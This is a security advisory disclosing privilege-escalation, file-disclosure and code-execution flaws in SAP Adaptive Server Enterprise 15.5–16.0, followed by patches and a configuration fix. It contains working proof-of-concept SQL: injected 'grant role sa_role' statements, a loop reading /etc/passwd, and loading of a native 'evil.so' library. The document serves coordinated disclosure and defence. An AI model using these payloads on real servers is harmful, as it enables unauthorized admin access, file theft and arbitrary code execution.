Trustwave SpiderLabs Security Advisory TWSL2015-008: Multiple Vulnerabilities in SAP Adaptive Server Enterprise Published: 05/22/15 Version: 1.0 Vendor: SAP (www.sap.com) Product: SAP Adaptive Server Enterprise (ASE) Version affected: 15.5, 15.7, 16.0 Product description: Relational database management system for UNIX, Linux, and Microsoft Windows platforms. Finding 1: Privilege Escalation Vulnerability (security note 2152278) Credit: Martin Rakhmanov of Trustwave CVE: CVE-2014-6285 SAP ASE has an implementation flaw in multiple dbcc commands. Specifically the dbcc reindex is vulnerable to sql injection. This issue could be exploited by database owners to elevate privileges to system administrator level. Example 1: Privilege escalation via SQL injection in dbcc reindex command (SecMsg ID 713559 2014) On attacker-controlled server run: use master go create database mydb go exec sp_dboption 'mydb', 'ddl in tran', 'true' go use mydb go exec sp_reptostandby mydb, 'ALL' go use mydb go create table mytbl (id int, val varchar(10)) create index s on mytbl(val) create index idx_mytbl on mytbl(id) go sp_configure 'allow updates', 1 go update sysindexes set status3 = 32, name = 's grant role sa_role to DEMO_LOGIN' from sysindexes where id = object_id('mytbl') and indid = 3 and name = 'idx_mytbl' plan "(update (i_scan csysindexes sysindexes))" go sp_configure 'allow updates', 0 go declare @db_id int, @obj_id int select @db_id = db_id('mydb'), @obj_id = object_id('mytbl') dbcc refreshides(@db_id, @obj_id, 3, 'indname') go dump database mydb to 'mydb.dump' go Then on victim server load the dump (requires database ownership) and invoke the dbcc reindex: load database mydb from 'mydb.dump' go online database mydb go use mydb go dbcc reindex(mytbl) go Example 2: Privilege escalation via SQL injection in dbcc createws command (SecMsg ID 33192 2015) use master go create database dbccdb go use dbccdb go sp_addsegment m, dbccdb, master go dbcc createws(dbccdb, 'm grant role sa_role to james', 'b(id int)--', scan, 48) go Finding 2: Information Exposure Vulnerability (security note 2152278) Credit: Martin Rakhmanov of Trustwave CVE: CVE-2015-3328 Example 1: Filesystem probing via java.io.File class (SecMsg ID 730132 2014) SAP Adaptive Server Enterprise with Java subsystem enabled is vulnerable to file probing via the java.io.File class. Attacker can use this to verify file existence and determine type of the file (file/directory). Using simple brute force approach this could be used to reconstruct file system layout. This vulnerability could be used to mount future attacks against the server's file system. -- File probing demo for SAP ASE on Windows -- File exists File Is Directory -- ----------- ----------------- -- 1 1 declare @f java.io.File set @f = new java.io.File("C:\WINDOWS\") select @f>>[exists]() as "File exists", @f>>[isDirectory]() as "File Is Directory" go Example 2: Filesystem access via java.io.* classes (SecMsg ID 52610 2015) SAP Adaptive Server Enterprise with Java subsystem enabled on UNIX and Linux is vulnerable to unauthorized file access via the java.io.RandomAccessFile class and some other java.io* classes. Attacker can use this to read files outside $SYBASE directory via SQL queries. This vulnerability could be used to mount future attacks against the server's file system. -- File reading demo for SAP ASE 16.0 PL02 on Linux set nocount on declare @pos int, @body varchar(16384), @ars java.io.RandomAccessFile select @ars = new java.io.RandomAccessFile("/etc/passwd", "r") set @pos = @ars>>[length]() set @body = '' while (@pos > 0) begin set @body = @body + char(@ars>>[readByte]()) set @pos = @pos - 1 end select @body go Finding 3: Insecure Library Loading Vulnerability (security note 2155153) Credit: Martin Rakhmanov of Trustwave CVE: CVE-2015-3311 SAP Adaptive Server Enterprise with Java subsystem enabled allows users to load native libraries. Valid database users can execute arbitrary code in the database server process context. Example 1: Remote Code Execution via Arbitrary Library Loading Vulnerability (SecMsg ID 35157 2015) declare @s java.lang.System select @s>>[load]("/export/home/sybase/evil.so") Remediation Steps: Apply one of these following vendor supplied patches: SAP ASE 16.0 SP01 PL01 SAP ASE 15.7 SP134 SAP ASE Cluster Edition 15.7 SP134 Additionally Finding 3 (security note 2155153) has additional configuration instructions as described below. For secure operation of your SAP ASE installations with Java functionality enabled, modify the SAP ASE configuration as follows. These instructions will disable use of java.io functionality in SAP ASE. Login to ASE as a user with sa_role, configure JRE work and temporary directories and reboot ASE. e.g. % isql -Usa -Pxxxxxx -SMYSERVER 1> use sybpcidb 2> go 1> sp_jreconfig 'disable', 'pca_jvm_work_dir', '/tmp(u+rw)' 2> go 1> sp_jreconfig 'update', 'pca_jvm_tmp_dir', '/tmp', '/dev/null' 2> go 1> sp_jreconfig 'reload' 2> go 1> shutdown 2> go % RUN_MYSERVER & Revision History: 09/23/14 - Finding #1 (SecMsg ID 713559 2014) disclosed to vendor 03/17/15 - Finding #1 (SecMsg ID 33192 2015) disclosed to vendor 09/26/14 - Finding #2 (SecMsg ID 730132 2014) disclosed to vendor 01/15/15 - Finding #2 (SecMsg ID 52610 2015) disclosed to vendor 01/09/15 - Finding #3 (SecMsg ID 35157 2015) disclosed to vendor 05/12/15 - Patch released by vendor 05/22/15 - Advisory published References 1. https://websmp230.sap-ag.de/sap/support/notes/2152278 2. https://websmp230.sap-ag.de/sap/support/notes/2155153 About Trustwave: Trustwave helps businesses fight cybercrime, protect data and reduce security risks. With cloud and managed security services, integrated technologies and a team of security experts, ethical hackers and researchers, Trustwave enables businesses to transform the way they manage their information security and compliance programs while safely embracing business imperatives including big data, BYOD and social media. More than 2.5 million businesses are enrolled in the Trustwave TrustKeeper® cloud platform, through which Trustwave delivers automated, efficient and cost-effective data protection, risk management and threat intelligence. Trustwave is a privately held company, headquartered in Chicago, with customers in 96 countries. For more information about Trustwave, visit www.trustwave.com. About Trustwave SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.